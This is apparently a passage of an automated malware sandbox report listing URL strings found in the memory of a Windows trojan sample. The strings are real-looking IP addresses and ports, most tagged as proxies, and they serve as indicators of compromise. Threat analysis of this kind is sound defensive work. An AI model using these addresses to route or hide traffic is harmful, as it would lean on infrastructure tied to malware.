                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://2.239.213.133:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://2.239.213.133:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://2.57.131.19:4145
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://2.57.131.19:4145://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.111.54.16
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.111.54.16://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.111.54.16:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C937E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.111.54.16:8123
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C93E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.111.54.16:8123://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C64DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.118.133.34:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C64DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.118.133.34:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAE42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.121.139.25:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAE42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.121.139.25:3128://proxyx
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.163.133.5
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.163.133.5://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C773A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.187.77.5
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C773A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.187.77.5://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7733000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.187.77.5:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C63C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.193.135.5
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C82D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.193.135.50
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.193.135.50://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.193.135.50:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6231000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.193.135.5://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6231000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.193.135.5:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.204.190.254:3129
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.204.190.254:3129://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.204.212.45:3129
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.204.212.45:3129://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.204.212.76:3129
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.204.212.76:3129://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.204.212.76:3129x
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.204.214.23:3129
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C63C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.204.214.23:3129://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.205.115.87:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.205.115.87:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.205.61.143
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.205.61.143://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.205.61.143:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD2A8000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD1F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.205.61.143:8123
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.205.61.143:8123://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.206.106.192
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.206.106.192://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.206.106.192:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.206.106.192:8123
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.206.106.192:8123://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD1F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.21.128.105
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD1F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.21.128.105://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD1F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.21.128.105:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.210.113.32
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.210.113.32://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.210.113.32:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.210.113.32:8123
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C661F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.210.113.32:8123://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBEC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.219.118.36
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBEC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.219.118.36://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBEC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.219.118.36:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.219.176.57:3129
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.219.176.57:3129://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.219.177.73:3129
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.219.177.73:3129://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.219.177.85:3129
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.219.177.85:3129://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAE42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.219.178.121:3129
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAE42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.219.178.121:3129://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAD8A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.219.180.105:3129
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAD8A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.219.180.105:3129://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.219.180.149:3129
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.219.180.149:3129://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C903D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.219.182.59:3129
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9002000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.219.182.59:3129://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.219.183.188:3129
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.219.183.188:3129://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.219.235.172:3129
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.219.235.172:3129://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.24.43.214
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.24.43.214://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.24.43.214:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.24.43.214:8123
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.24.43.214:8123://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA5A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.27.86.185
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.27.86.185://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95BA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.27.86.185:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.44.188.17:3129
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C68A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.44.188.17:3129://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.44.189.184:3129
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.44.189.184:3129://proxyx
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C846E000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C83C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.44.190.150:3129
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8421000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.44.190.150:3129://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.44.206.138
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.44.206.138://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.44.206.138:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA62F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA5D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.58.43.148:2028
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA60E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.58.43.148:2028://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB01D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.6.9.237:20000
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB015000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.6.9.237:20000://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.78.102.191
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.78.102.191://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.78.102.191:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.10.150.115
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.10.150.115://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.10.150.115:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.106.124.54:999
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.106.124.54:999://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.106.184.97:999
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.106.184.97:999://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.108.197.2:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.108.197.2:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C661F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.108.234.105:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C661F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.108.234.105:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD140000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.109.65.110:4153
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.109.65.110:4153://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.110.173.17:999
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.110.173.17:999://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.111.182.6:443
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.111.182.6:443://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.111.232.94:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.111.232.94:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8173000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.116.198.160:58927
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8173000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.116.198.160:58927://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.116.198.180:32605
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.116.198.180:32605://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6674000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6689000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.116.198.222:9812
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6684000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.116.198.222:9812://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.117.13.75:999
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.117.13.75:999://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD12C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.117.13.75:999x
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD07F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.125.184.61:999
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCC47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.125.184.61:999://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.155.168.70:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.155.168.70:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.170.196.94:1080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.170.196.94:1080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.174.198.95:8888
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.174.198.95:8888://proxy
